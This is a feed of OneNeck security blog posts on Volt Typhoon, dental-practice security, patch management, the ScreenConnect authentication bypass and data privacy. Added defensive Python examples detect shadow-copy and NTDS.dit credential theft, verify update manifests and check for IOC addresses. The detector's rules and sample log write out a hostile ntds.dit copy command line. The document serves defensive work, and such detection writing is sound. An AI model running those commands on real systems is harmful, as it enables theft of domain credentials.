IT Security news and information blog | OneNeck
https://www.oneneck.com
Thu, 06 Jun 2024 17:52:08 +0000

Cyber Attack Prevention: Defending Against Volt Typhoon
https://www.oneneck.com/cyber-attack-prevention-defending-against-volt-typhoon/
Wed, 27 Mar 2024 16:38:06 +0000

Cybersecurity remains at the forefront of national security concerns, especially with state-sponsored cyber activities targeting critical infrastructure. Recent advisories from the Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with the National Security Agency (NSA) and the FBI, have brought to light the activities of People’s Republic of China state-sponsored actors, notably referred to as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus). These cyber criminals, whose latest attack was identified in May 2023, are strategically positioning themselves within IT networks of U.S. critical infrastructure sectors, including Communications, Energy, Transportation Systems, and Water and Wastewater Systems, to potentially launch a disruptive or destructive cyber attack.

The Dangers Presented by Volt Typhoon’s Cyber Attack

Volt Typhoon’s most recent strategy highlights the sophisticated use of “living off the land” (LOTL) techniques. This method involves leveraging legitimate features of a system to remain undetected while conducting malicious activities. Specifically, the actors engage in detailed reconnaissance, exploit vulnerabilities in public-facing network appliances for initial access, and then leverage administrator credentials for lateral movement and domain control. The result is an approach that is at once strategic and stealthy. These tactics signify a departure from traditional cyber-based espionage, hinting at a more ominous intent of pre-positioning for future activities.

Tactics and Techniques Utilized by Volt Typhoon:

  • Establish initial access through vulnerabilities in network appliances, followed by use of VPN access.
  • Obtain administrator credentials, often via privilege escalation or insecure credential storage.
  • Move laterally to domain controllers using valid credentials and Remote Desktop Protocol.
  • Use PowerShell for targeted queries against Windows event logs, conducted over stealthy network infrastructure.
  • Use the Volume Shadow Copy Service to access the Active Directory database (NTDS.dit) and achieve full domain compromise.
  • Employ offline password cracking to gain elevated network access.
  • Focus infiltration on OT assets and test access with default vendor or compromised OT system credentials.
  • Create the potential for significant disruption, including manipulation of HVAC systems or critical energy and water controls.

For a more detailed overview, visit the CISA Cybersecurity Advisory website.

Strategic Implications and Recommendations

The revelation of Volt Typhoon’s activities should serve as a wake-up call for bolstering security measures across critical infrastructure sectors. Additionally, these attacks underscore the importance of adopting a proactive and strategic approach to security, emphasizing resilience and the capacity to deter sophisticated threats.

Key recommendations for mitigating the risk posed by Volt Typhoon include:

  • Patching of Internet-facing Systems: Regularly update and patch Internet-facing systems, prioritizing critical vulnerabilities known to be exploited by Volt Typhoon. This patch management reduces the attack surface and protects against known exploits.
  • Phishing-resistant Multifactor Authentication (MFA): Deploy phishing-resistant MFA to safeguard access to networks and sensitive information. This process adds a crucial layer of security that attackers using stolen credentials cannot easily bypass.
  • Conditional Access Policies: Implement conditional access policies that evaluate the context of access requests (user identity, location, device security status, etc.) and apply appropriate security controls. This access restriction helps minimize risks by ensuring only legitimate, authenticated, and authorized access to critical resources.
  • Comprehensive Logging and Monitoring: Implement an extensive logging and monitoring regime. Ensure all application, access, and security logs are collected and analyzed in detail, focusing on detecting subtle, sophisticated tactics like those employed by Volt Typhoon, including LOTL techniques.
  • Technology Lifecycle Management: Develop a strategy for managing the end-of-life of technology the manufacturer no longer supports. Update or replace outdated systems to close vulnerabilities that attackers could exploit.
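The tactics list above and the logging and monitoring recommendation both come down to spotting legitimate tools used in an illegitimate sequence. The following is an added example (not CISA or OneNeck code) that flags the shadow-copy creation, NTDS.dit access and targeted event-log query steps in Windows process-creation telemetry and correlates them per host; the log format, hostnames, accounts and command lines are constructed.

```python
"""Flag the living-off-the-land steps listed above (shadow-copy creation,
NTDS.dit access, targeted event-log queries) in Windows process-creation
telemetry and correlate them per host. Added example, not CISA or OneNeck
code; the log format, hostnames, accounts and command lines are constructed."""
import re
from dataclasses import dataclass

# (rule name, image-path pattern, command-line pattern)
RULES = [
    ("shadow-copy-create", r"(?i)\\vssadmin\.exe$", r"(?i)\bcreate\s+shadow\b"),
    ("shadow-copy-create", r"(?i)\\wmic\.exe$", r"(?i)\bshadowcopy\b.*\bcreate\b"),
    ("ntds-extract", r"(?i)\\ntdsutil\.exe$", r"(?i)\bntds\b|\bifm\b"),
    ("ntds-file-access", r".", r"(?i)ntds\.dit"),
    ("eventlog-query", r"(?i)\\(powershell|pwsh)\.exe$", r"(?i)Get-WinEvent|Get-EventLog"),
    ("eventlog-query", r"(?i)\\wevtutil\.exe$", r"(?i)\b(qe|query-events)\b"),
]

# Shadow copies are routine for backup software; suppress that rule for the
# accounts that are supposed to create them (constructed allowlist).
BACKUP_ACCOUNTS = {r"CORP\svc-backup"}


@dataclass
class Event:
    host: str
    user: str
    image: str
    command_line: str


def parse_line(line: str) -> Event:
    """Constructed format: 'host=... | user=... | image=... | cmd=...'."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return Event(fields["host"], fields["user"], fields["image"], fields["cmd"])


def evaluate(event: Event) -> set:
    """Return the names of the rules this event triggers."""
    hits = set()
    for name, image_re, cmd_re in RULES:
        if not (re.search(image_re, event.image) and re.search(cmd_re, event.command_line)):
            continue
        if name == "shadow-copy-create" and event.user in BACKUP_ACCOUNTS:
            continue  # expected backup behaviour, not an alert
        hits.add(name)
    return hits


def severity(rules: set) -> str:
    # A shadow copy followed by NTDS.dit access on the same host is the
    # credential-theft chain described above; a lone event-log query from an
    # admin workstation needs more context before it is escalated.
    if "ntds-extract" in rules or {"shadow-copy-create", "ntds-file-access"} <= rules:
        return "high"
    return "medium"


def analyze(lines) -> list:
    """Correlate rule hits per host; returns [(host, severity, sorted rule names)]."""
    per_host = {}
    for line in lines:
        if not line.strip():
            continue
        event = parse_line(line)
        hits = evaluate(event)
        if hits:
            per_host.setdefault(event.host, set()).update(hits)
    return [(host, severity(rules), sorted(rules)) for host, rules in sorted(per_host.items())]


# Constructed sample telemetry: a legitimate backup on DC01, the shadow-copy
# plus NTDS.dit copy chain on DC02, and an event-log query on a workstation.
SAMPLE_LOG = r"""
host=DC01 | user=CORP\svc-backup | image=C:\Windows\System32\vssadmin.exe | cmd=vssadmin create shadow /for=C:
host=DC02 | user=CORP\jdoe | image=C:\Windows\System32\vssadmin.exe | cmd=vssadmin create shadow /for=C:
host=DC02 | user=CORP\jdoe | image=C:\Windows\System32\cmd.exe | cmd=cmd.exe /c copy X:\shadow1\Windows\NTDS\ntds.dit C:\Windows\Temp\n.dat
host=WS17 | user=CORP\asmith | image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd=powershell.exe -c "Get-WinEvent -LogName Security -MaxEvents 500"
host=WS17 | user=CORP\asmith | image=C:\Windows\System32\notepad.exe | cmd=notepad.exe notes.txt
""".splitlines()

if __name__ == "__main__":
    for host, sev, rules in analyze(SAMPLE_LOG):
        print(f"{host}: {sev} {rules}")
```

In production the rule table would be fed from Sysmon event ID 1 or Security event 4688 with command-line auditing enabled, and the allowlist from the backup platform's service accounts.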

Weathering the Typhoon of a Cyber Attack with a Trusted Partner

The activities of Volt Typhoon highlight the evolving threat landscape and the need for constant vigilance and adaptation in cybersecurity practices. By understanding and monitoring the tactics and strategies employed by these bad actors, cybersecurity professionals can better protect both their organization’s valuable data and critical infrastructure from potential threats. This requires both technological solutions and a strategic mindset that anticipates and mitigates the sophisticated methods in use.

However, the complexity, sophistication, and sheer volume of these threats often surpass the capabilities of in-house IT staff. This gap is where teaming with a reliable security partner becomes paramount. A seasoned security partner brings expertise, advanced technology solutions, and a proactive approach to identifying and mitigating threats, offering a comprehensive strategy that extends beyond traditional measures. This expertise ensures organizations can defend against complex attacks and stay ahead of potential vulnerabilities.

OneNeck IT Solutions offers a strategic advantage in response to such threats. Our experienced team provides a broad range of security services designed to protect against sophisticated cyber threats. Our security solutions, including cloud, managed, and professional services, help ensure a robust defense against a cyber attack from actors like Volt Typhoon.

Partnering with OneNeck is the perfect next step for organizations looking to enhance their security posture. Contact us today to learn more about how our services can protect your organization from sophisticated cyber threats.


Biting Back: How Dental Practices Can Defend Against Rising Cyber Threats
https://www.oneneck.com/blog/biting-back-how-dental-practices-can-defend-against-cyber-threats/
Tue, 19 Mar 2024 15:05:16 +0000

For much of my adult life, I’ve been surrounded by family and friends who are dentists and orthodontists. I’ve seen first-hand the demanding time commitment required to care for patients while still trying to maintain staffing, run a dental practice, and manage an oral care business. It’s all-consuming, and while the focus is on keeping smiles bright and healthy, there’s an unseen menace that’s not so easily brushed away: cyber threats.

It’s a tricky situation; dentists, orthodontists, and their office managers are experts at filling cavities, not firewall vulnerabilities. And who can blame them? When juggling appointments, patient care, and the daily operations of a dental office, there’s barely enough time to floss, let alone fend off cybercriminals.

However, as the digital age continues to evolve rapidly, so does the sophistication of cyber threats, making it crucial for dental practices to prioritize cybersecurity. Unfortunately, as with the broader healthcare industry, the dental industry is far from immune to these attacks. Recently, we’ve seen the unprecedented impacts of ransomware attacks on Change Healthcare (the technical arm of United Healthcare), and there have been several instances targeting dental offices as well, resulting in significant financial losses and the compromise of sensitive patient information. Such breaches damage the trust patients place in their healthcare providers and can come with hefty fines and legal ramifications.

Rooting Out Risk: Cybersecurity Hygiene for Dental Professionals

So, how can dental and orthodontic practices brace themselves against these threats? Here are 3 must-dos to keep your practice’s digital hygiene in tip-top shape:

Regular Check-Ups to Discover Cyber Threats

Just as regular dental check-ups prevent minor issues from becoming major problems, regular cybersecurity assessments can help identify vulnerabilities before exploitation. This prevention includes keeping all software up to date with regular patching, conducting periodic security training for all staff to know what to be on alert for, and implementing strong password policies to protect access to critical applications, data and systems.

Seal the Gaps in Your Defenses

Ensure that all patient data is encrypted and securely backed up. Consider it the digital equivalent of enamel to prevent decay. Encryption acts as a barrier, making it difficult for unauthorized individuals to access sensitive information.

As fluoride treatment provides additional protection on top of enamel, so does multi-factor authentication (MFA). Even if a staff member’s password is compromised, MFA protects against unauthorized access to data and accounts.

Don’t Go It Alone Against Cyber Threats

Dental practices should consider partnering with cybersecurity experts to safeguard their operations, just as patients turn to dental professionals for their expertise. OneNeck IT Solutions offers a robust portfolio of security consulting services, managed services, and resale solutions tailored to dental practices’ unique needs. Our team understands the challenges you face and is equipped to handle the technicalities of cybersecurity, allowing you to focus on what you do best: caring for your patients.

Recommended by 9 out of 10 Security Professionals

In an industry where trust is paramount, ensuring the security of patient data is not just about regulatory compliance; it’s about maintaining the confidence and loyalty of those you serve. In today’s battle against cyber threats, it’s imperative to have a strong defense to lessen the likelihood of a painful recovery. Think of OneNeck IT Solutions as your practice’s cybersecurity orthodontist, here to straighten out your digital defense and keep your practice’s data as healthy as the smiles you create.

Remember, while the world of cybersecurity may seem daunting, you’re not alone. By taking proactive steps and partnering with experienced professionals, your practice can bite back against cyber threats. Just like preventive dentistry, early detection and treatment can save you from more painful procedures down the line.

Contact us today to craft a custom security plan that keeps your data safe, secure, and shining brightly.


Navigating the Patch Management Labyrinth: A Strategic Path for IT Security
https://www.oneneck.com/blog/navigating-the-patch-management-labyrinth-a-strategic-path-for-it-security/
Tue, 27 Feb 2024 19:32:17 +0000

When it comes to IT security, it’s nearly impossible to overstate patch management’s significance. It’s a pivotal process that, if disregarded, often leads to dire consequences. The intricate nature of today’s IT ecosystems, with their vast networks and complex software interdependencies, presents a challenging landscape. This complexity necessitates a strategic, well-informed approach to navigating the patch management labyrinth, ensuring the integrity and security of critical technical infrastructures.

Consequences of a Breach

The 2017 Equifax breach should stand as a stark reminder of the vulnerabilities inherent in neglecting patch management. This breach, one of the largest in history, exposed the sensitive personal information of approximately 147 million U.S. consumers, including names, Social Security numbers, and dates of birth. The attack’s success was attributed to exploiting a known vulnerability that simply wasn’t patched in a timely manner.

The fallout from this incident was immense, leading to widespread criticism of Equifax’s data security practices and the eventual settlement with the Consumer Financial Protection Bureau (CFPB), the Federal Trade Commission (FTC), and 48 states, amounting to nearly $700 million in monetary relief and penalties. This breach underscores the ever-evolving cybersecurity threats confronting private and government entities and highlights the critical need for stringent patching practices.

Embracing Patch Management Services

Patching is a never-ending journey where IT teams can easily fall behind; however, embracing managed services offers a more tenable long-term option. These services, adhering to stringent security frameworks such as NIST 800-171 or CIS Controls, provide dedicated resources necessary for the efficient and timely application of patches. This approach aids organizations in maintaining compliance with changing regulations and strengthens defenses against cyber threats.

Managed services providers offer a dual advantage:

  • Free Up Internal Resources: Allows organizations to reallocate their internal resources towards core business operations, enhancing productivity and focus.
  • Access to Cybersecurity Expertise: Provides organizations with the latest cybersecurity expertise, keeping pace with evolving threats and technologies and ensuring a proactive defense mechanism.

By leveraging the knowledge and capabilities of managed service providers, organizations can navigate the patch management labyrinth with greater confidence and efficiency, ensuring a more robust security posture.

Risk and Response

Vulnerability scanning and security assessments play complementary yet distinct roles in the patch management process. Continuous vulnerability scanning is critical for identifying software that requires updates or may be associated with known bugs or vulnerabilities. On the other hand, risk assessments are conducted periodically to inform the policies and procedures that influence an organization’s vulnerability management efforts. While these assessments provide strategic direction and help ensure that patching practices are standardized and effective, it’s important to note that patching activities can proceed independently of risk assessments. When properly combined, these activities lay a solid foundation for developing and maintaining robust mitigation strategies.

Ultimately, the value of these assessments lies in identifying holes in vulnerability management policy and procedure, thus creating a catalyst for the necessary remediation to close those gaps. Interpreting the results requires a deep understanding of the organization’s risk profile and the potential impact of each vulnerability. This interpretation is where frameworks like CIS Controls prove invaluable, guiding organizations systematically to manage technical vulnerabilities effectively. Adhering to such standards ensures that the insights gained from assessments lead to actionable, prioritized steps that enhance the organization’s overall security posture.

Organizations can create a proactive defense mechanism by regularly assessing their security policies and procedures, thus directing the vulnerability scanning and patch management processes. This strategic approach addresses current vulnerabilities and sets the stage for a more resilient and secure IT infrastructure.

Lessons from the Field

The hacking of SolarWinds serves as a stark reminder of the critical importance of integrity and thoroughness in the patch management process. In this breach, attackers compromised the software development or update mechanism used by SolarWinds, a company that produces network management software widely used across government and private sectors. The attackers inserted malicious code into the company’s Orion software updates, which, once deployed, created a backdoor for the attackers into the victim’s IT environment.

The significance of this incident lies not only in its scale but also in the method of attack. It illustrates that the security process is as vital as the application of the patches. In this instance, attackers exploited organizations’ trust in their software vendors and the updates they provide. This breach underscores organizations’ need to apply patches promptly and verify the integrity and security of the patches themselves, along with the mechanisms used to deliver and install them.
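Verifying "the integrity and security of the patches themselves" means checking an update bundle against a manifest whose own authenticity was established out of band, and refusing anything the manifest does not vouch for. The following is an added example (not SolarWinds, ConnectWise or OneNeck code): the bundle, manifest and pinned manifest digest are constructed, and in practice the pinned digest would be copied from the vendor's separately published advisory or replaced by a signature check.

```python
"""Verify a vendor update bundle against its manifest before installation.
Added example, not SolarWinds or OneNeck code; the bundle contents and the
manifest are constructed. The manifest digest is pinned from a channel
separate from the download (here computed in-line only to keep the example
self-contained); a modified bundle, a modified manifest, or a component the
manifest never listed all cause the install to be refused."""
import hashlib
import hmac
import posixpath
from dataclasses import dataclass, field


@dataclass
class Verdict:
    ok: bool
    problems: list = field(default_factory=list)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_manifest(text: str) -> dict:
    """Parse 'sha256hex  relative/path' lines; reject anything malformed or unsafe."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"manifest line {lineno}: malformed")
        digest, path = parts
        digest = digest.lower()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"manifest line {lineno}: bad digest")
        norm = posixpath.normpath(path)
        # A manifest must not be able to direct files outside the install root.
        if path.startswith("/") or norm.startswith("..") or "\\" in path:
            raise ValueError(f"manifest line {lineno}: unsafe path {path!r}")
        if norm in entries:
            raise ValueError(f"manifest line {lineno}: duplicate path {path!r}")
        entries[norm] = digest
    return entries


def verify_bundle(files: dict, manifest_text: str, pinned_manifest_sha256: str) -> Verdict:
    """files maps relative path -> bytes, as unpacked from the bundle."""
    # 1. The manifest itself must match the digest obtained out of band.
    if not hmac.compare_digest(sha256_hex(manifest_text.encode()), pinned_manifest_sha256):
        return Verdict(False, ["manifest digest does not match pinned value; refusing to read it"])
    try:
        expected = parse_manifest(manifest_text)
    except ValueError as exc:
        return Verdict(False, [str(exc)])
    problems = []
    # 2. Every listed file must be present with the right digest.
    for path, digest in expected.items():
        data = files.get(path)
        if data is None:
            problems.append(f"missing: {path}")
        elif not hmac.compare_digest(sha256_hex(data), digest):
            problems.append(f"digest mismatch: {path}")
    # 3. Nothing may ride along that the manifest does not vouch for.
    for path in files:
        if path not in expected:
            problems.append(f"unlisted component: {path}")
    return Verdict(not problems, problems)


# Constructed "known good" bundle and the manifest the vendor would ship with it.
GOOD_BUNDLE = {
    "bin/update-agent.exe": b"MZ constructed installer bytes",
    "lib/telemetry.dll": b"constructed library bytes",
}
MANIFEST = "# constructed vendor manifest\n" + "".join(
    f"{sha256_hex(data)}  {path}\n" for path, data in GOOD_BUNDLE.items()
)
# In practice: copied from the vendor's advisory page, not derived from the download.
PINNED_MANIFEST_SHA256 = sha256_hex(MANIFEST.encode())

if __name__ == "__main__":
    print(verify_bundle(GOOD_BUNDLE, MANIFEST, PINNED_MANIFEST_SHA256))
```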

Consultative Approach to Patch Management

The effectiveness of patch management critically hinges on a consultative approach. With the complex landscape of cybersecurity threats evolving rapidly, consulting services offer the expertise needed to navigate these challenges efficiently. Adopting a consultative approach to patch management not only streamlines the process of addressing vulnerabilities but also fortifies an organization’s defenses against future cybersecurity threats.

  • Expert Guidance: Provide specialized knowledge to help organizations sift through complex vulnerability reports, ensuring a clear understanding of the threat landscape.
  • Prioritization of Patches: Identify and prioritize patches crucial for maintaining operational security and compliance, focusing efforts where they are most needed.
  • Proactive Vulnerability Management: Advocate for continuous monitoring and early threat detection per cybersecurity frameworks like CIS.
  • Constant Vigilance: Encourage a culture of vigilance and ongoing assessment within organizations, promoting a thorough and integrity-focused patching process.

A Patch Management Partnership: Crafting a Secure Future

The journey through the patch management landscape is more than just a technical endeavor; it demands a strategic mindset that embraces continuous improvement and an understanding of the broader cybersecurity environment. Patch management requires a holistic strategy encompassing multiple facets of cybersecurity. This comprehensive approach integrates managed services to offload and streamline patch applications, employs detailed security assessments to uncover vulnerabilities, and follows the principles laid out by established security frameworks.

This path, though demanding, paves the way to a secure and robust digital future, safeguarding the organization’s assets and data against potential breaches. OneNeck is here to help with an experienced team that provides tailored solutions for patching and any other aspect of systems management your organization may need. Our extensive expertise across multiple platforms and industries allows us to deliver a right-fit solution for you.

Contact us today to speak with a member of our team.


Check out our Monthly Patching Blog series to keep up to date on the latest critical updates from our vendors.


Critical ScreenConnect Vulnerability: Authentication Bypass Risk
https://www.oneneck.com/blog/critical-screenconnect-vulnerability-authentication-bypass-risk/
Thu, 22 Feb 2024 21:55:50 +0000

A critical vulnerability has been uncovered in ConnectWise’s ScreenConnect. Identified under CVE-2024-1709, this susceptibility poses a significant threat, prompting immediate and decisive action to safeguard sensitive information and maintain operational integrity.

Importantly, for our clients and partners, OneNeck has not been impacted by this vulnerability. However, we recognize the importance of staying informed on all potential security threats and providing guidance on mitigation strategies to our partners and customers.

A Closer Look at the ScreenConnect Vulnerability

Initially reported on February 13, 2024, through ConnectWise’s vulnerability disclosure channel, the exposures demand immediate action from on-premise customers. These security risks involve:

  • CWE-288: Authentication bypass using an alternate path or channel
  • CWE-22: Improper limitation of a pathname to a restricted directory (“path traversal”)

Both vulnerabilities highlight the need for stringent security measures. The CVSS score for CWE-288 stands at a critical 10, underlining the severity of the threat. This score is derived from several metrics and indicates that the vulnerability is easily exploitable and could have a high impact on confidentiality, integrity, and availability.

Indicators of Compromise

The following IP addresses have been identified by ConnectWise as being used by threat actors and are provided below for your protection and defense.

IOCs:

  • 155.133.5.15
  • 155.133.5.14
  • 118.69.65.60

ConnectWise’s Response and Remediation Steps

ConnectWise promptly issued a security bulletin outlining remediation steps after discovering the vulnerability. Cloud customers, including those using “screenconnect.com” and “hostedrmm.com,” were automatically secured against these vulnerabilities as of February 19, requiring no additional actions on their part.

On-prem users, on the other hand, are urged to update to the latest ScreenConnect version, 23.9.10.8817, immediately to protect against these threats, with version 23.9.8 being the minimum requirement to mitigate the reported vulnerabilities. Notably, ConnectWise has lifted license restrictions to ensure all customers, even those not currently under maintenance, can upgrade to the latest version.

  • For instructions on updating to the newest release, please reference this document.
  • Link to patch: Download

Immediate Steps for ScreenConnect Users

The identification of CVE-2024-1709 necessitates immediate action from ConnectWise partners. As mentioned above for cloud users, remediation has been automatically applied, ensuring security without further steps needed, though continued monitoring of your environment is highly recommended. For on-premises users, updating your systems is critical. Upgrading to the latest ScreenConnect version is not just recommended; it’s essential for safeguarding against potential exploitation.

Best Practices and a Partner That Has Your Back

The discovery of this issue serves as a valuable lesson for all organizations in the importance of timely updates and the implementation of a robust cybersecurity framework.

Key recommendations include:

  • Regularly updating and patching software to mitigate vulnerabilities.
  • Monitoring systems for indicators of compromise to detect and respond to threats promptly.
  • Educating stakeholders about the importance of cybersecurity hygiene.
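Two of the immediate steps above, confirming that on-premises installs are at or beyond the 23.9.8 threshold and watching for the published IOC addresses, are easy to get subtly wrong: comparing version strings lexically ranks 23.9.10.8817 below 23.9.8. The following is an added example (not ConnectWise or OneNeck code) that does both checks; the host inventory and the IIS-style log lines are constructed, while the threshold version and IOC addresses are the ones given in the bulletin.

```python
"""Two triage checks for the ScreenConnect bulletin above: is an on-prem
install at or beyond the 23.9.8 fix threshold, and do web-access logs show
the IOC addresses ConnectWise published. Added example, not ConnectWise or
OneNeck code; the inventory and log lines are constructed."""
import ipaddress
import re

FIXED_VERSION = "23.9.8"  # minimum version named in the bulletin
IOC_ADDRESSES = {"155.133.5.15", "155.133.5.14", "118.69.65.60"}  # from the bulletin


def parse_version(version: str) -> tuple:
    parts = version.strip().split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognized version string {version!r}")
    return tuple(int(p) for p in parts)


def is_patched(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """Numeric, component-wise comparison. A plain string compare would rank
    23.9.10.x below 23.9.8 because '1' sorts before '8'."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))   # missing trailing components count as 0
    b += (0,) * (width - len(b))
    return a >= b


def unpatched_hosts(inventory: dict) -> list:
    """Hosts below the threshold, or whose version cannot be parsed (treated as unpatched)."""
    out = []
    for host, version in inventory.items():
        try:
            ok = is_patched(version)
        except ValueError:
            ok = False
        if not ok:
            out.append(host)
    return sorted(out)


IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def ioc_hits(log_lines) -> list:
    """(line number, address) for every valid IPv4 literal that is on the IOC list."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        for candidate in IPV4_RE.findall(line):
            try:
                addr = str(ipaddress.ip_address(candidate))  # drops e.g. 999.1.1.1
            except ValueError:
                continue
            if addr in IOC_ADDRESSES:
                hits.append((lineno, addr))
    return hits


INVENTORY = {  # constructed host -> reported ScreenConnect version
    "sc-prod-01": "23.9.10.8817",
    "sc-lab-02": "23.9.7.8804",
    "sc-legacy": "22.6.2.7980",
    "sc-unknown": "n/a",
}

# Constructed IIS-style lines: date time server-ip method uri query port user client-ip agent status
SAMPLE_LOG = [
    "2024-02-20 03:14:07 10.0.0.5 GET /Login - 443 - 203.0.113.9 Mozilla/5.0 200",
    "2024-02-20 03:15:22 10.0.0.5 POST /Login - 443 - 155.133.5.15 python-requests/2.31 200",
    "2024-02-20 03:16:01 10.0.0.5 GET /Administration - 443 admin 198.51.100.7 Mozilla/5.0 200",
    "2024-02-20 03:17:45 10.0.0.5 GET /Administration - 443 admin 118.69.65.60 curl/8.4.0 200",
]

if __name__ == "__main__":
    print("needs update:", unpatched_hosts(INVENTORY))
    print("IOC hits:", ioc_hits(SAMPLE_LOG))
```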

At OneNeck, the security of our customers is our top priority. We are dedicated to informing our customers about potential security threats, regardless of whether we directly manage those services. Our commitment extends beyond mere awareness; we actively provide support and guidance to ensure our customers can navigate the cybersecurity landscape confidently. Should you need assistance or have concerns about your security posture, our Customer Support Center is ready to help.


Securing Data Privacy: Strategies for Surviving Digital Transformation
https://www.oneneck.com/blog/securing-data-privacy-strategies-for-surviving-digital-transformation/
Mon, 22 Jan 2024 15:26:44 +0000

As we step into Data Privacy Week, we should reflect on the importance of protecting data throughout an organization and at an individual level. In a time when digital transformation is rapidly advancing, data privacy challenges have become more complex and demanding. This week is a timely reminder of the continuous efforts needed to safeguard sensitive information in our hyper-connected world.

The acceleration of digital integration into our daily lives and businesses brings countless potential vulnerabilities. Addressing data privacy vulnerabilities requires both a shift in mindset and an approach built on advanced technical solutions.

Emphasizing Security Awareness Training: Empower Your Workforce

A knowledgeable and vigilant workforce is a critical defense mechanism against cyber threats, and building this first line of defense is a multifaceted endeavor. Cyber threats constantly shift, necessitating regular training to keep the workforce aware of the latest risks, threats and defense mechanisms. Continuous education is crucial in building a proactive culture of security. It ensures employees are not just aware but are also actively participating in safeguarding organizational data.

Engagement is the key to retention, and this is where interactive training platforms come into play. By employing simulated attacks, interactive learning modules, and incorporating real-world scenarios, the training process becomes more than just a routine exercise. It becomes an immersive experience, significantly enhancing the understanding and retention of cybersecurity best practices. This approach ensures the principles of cybersecurity are not just learned in theory but are ingrained in the everyday behavior and mindset of the workforce.

Robust Data Access Controls: A Strategic Necessity for Data Privacy

One of the most critical yet often overlooked cybersecurity areas is managing internal access to data. Robust data access controls are not just an add-on but a strategic necessity. How data is accessed and handled internally can have a significant impact on an organization’s vulnerability to security breaches.

These controls serve as the foundation of a comprehensive cybersecurity strategy, ensuring sensitive information is accessed responsibly and securely. The goal, of course, is to prevent unauthorized external access and to manage precisely how internal users interact with, share, and utilize data.

  • Customized Access Rights – Tailoring access controls to employees’ specific needs and roles is essential in minimizing unnecessary data exposure. This customization ensures that employees have access to the data they need for their roles and no more, thereby reducing the risk of internal data breaches.
  • Automated Solutions – With the complexity of modern network environments, manually managing access rights is no longer viable. Automated tools are crucial for the efficient management and monitoring of access rights, ensuring that the right people have the proper access at the correct times and that access is revoked when no longer needed. These systems play a role in identifying and responding to unauthorized access attempts, enhancing overall data security.
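The two points above, rights tailored to a role and automated grant management that revokes access when it is no longer needed and records unauthorized attempts, are shown together in the following added example (not OneNeck or Microsoft Entra code). The roles, users and timestamps are constructed, and the 90-day maximum grant lifetime is an assumed policy value.

```python
"""Role-scoped, time-bounded access grants with automatic revocation and an
audit trail of denied requests. Added example, not OneNeck or Microsoft Entra
code; the role model, users, timestamps and 90-day limit are constructed."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

MAX_GRANT_TTL = timedelta(days=90)  # assumed policy: longer access must be re-approved

# Constructed role model: each role carries only the (resource, action) pairs
# that job function needs.
ROLE_PERMISSIONS = {
    "billing-clerk": {("invoices", "read"), ("invoices", "write")},
    "support-agent": {("tickets", "read"), ("tickets", "write"), ("customers", "read")},
    "auditor": {("invoices", "read"), ("customers", "read"), ("audit-log", "read")},
}


@dataclass
class Grant:
    user: str
    role: str
    expires_at: datetime   # every grant carries an end date
    reason: str


@dataclass
class AccessControl:
    grants: list = field(default_factory=list)
    denied: list = field(default_factory=list)  # audit trail of refused requests

    def grant(self, user: str, role: str, ttl: timedelta, reason: str, now: datetime) -> None:
        if role not in ROLE_PERMISSIONS:
            raise ValueError(f"unknown role {role!r}")
        if ttl > MAX_GRANT_TTL:
            raise ValueError("grant exceeds maximum lifetime; request re-approval")
        self.grants.append(Grant(user, role, now + ttl, reason))

    def active_roles(self, user: str, now: datetime) -> set:
        return {g.role for g in self.grants if g.user == user and g.expires_at > now}

    def is_allowed(self, user: str, resource: str, action: str, now: datetime) -> bool:
        allowed = any(
            (resource, action) in ROLE_PERMISSIONS[role]
            for role in self.active_roles(user, now)
        )
        if not allowed:
            self.denied.append((now, user, resource, action))  # feeds unauthorized-access review
        return allowed

    def revoke_expired(self, now: datetime) -> list:
        """Automated sweep: drop expired grants and return them for the audit log."""
        expired = [g for g in self.grants if g.expires_at <= now]
        self.grants = [g for g in self.grants if g.expires_at > now]
        return expired


def demo() -> dict:
    """Walk one grant through its lifetime; returns the observed decisions."""
    t0 = datetime(2024, 1, 22, 9, 0, tzinfo=timezone.utc)
    ac = AccessControl()
    ac.grant("alice", "billing-clerk", timedelta(days=30), "Q1 invoicing", t0)
    day1, day31 = t0 + timedelta(days=1), t0 + timedelta(days=31)
    return {
        "write_invoice_day1": ac.is_allowed("alice", "invoices", "write", day1),
        "read_customers_day1": ac.is_allowed("alice", "customers", "read", day1),  # outside role
        "write_invoice_day31": ac.is_allowed("alice", "invoices", "write", day31),  # grant lapsed
        "revoked": len(ac.revoke_expired(day31)),
        "denied_events": len(ac.denied),
    }


def ttl_rejected() -> bool:
    """True if a grant longer than the policy maximum is refused."""
    ac = AccessControl()
    try:
        ac.grant("bob", "auditor", MAX_GRANT_TTL + timedelta(days=1), "annual review",
                 datetime(2024, 1, 1, tzinfo=timezone.utc))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(demo())
```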

If your Microsoft Active Directory or Entra ID environment has not been reviewed and optimized recently (or ever), OneNeck’s expert Microsoft security consultants can quickly and easily engage to ensure your automated tools are helping (rather than hindering) your security efforts.

The Power of Segmentation: Isolating Risks

Network segmentation involves creating distinct barriers within a network, effectively separating different areas to isolate risks and prevent breakouts. Organizations can significantly mitigate the impact of potential breaches by dividing the network into distinct zones, each with its own unique types of data and access levels.

When networks are segmented, a breach in one area is contained, preventing it from spreading across the entire network. This isolation is particularly beneficial in large organizations, where the diversity and volume of data can vary significantly across different departments. By segmenting these areas, organizations can apply tailored security measures appropriate for the sensitivity of the data contained within each segment.

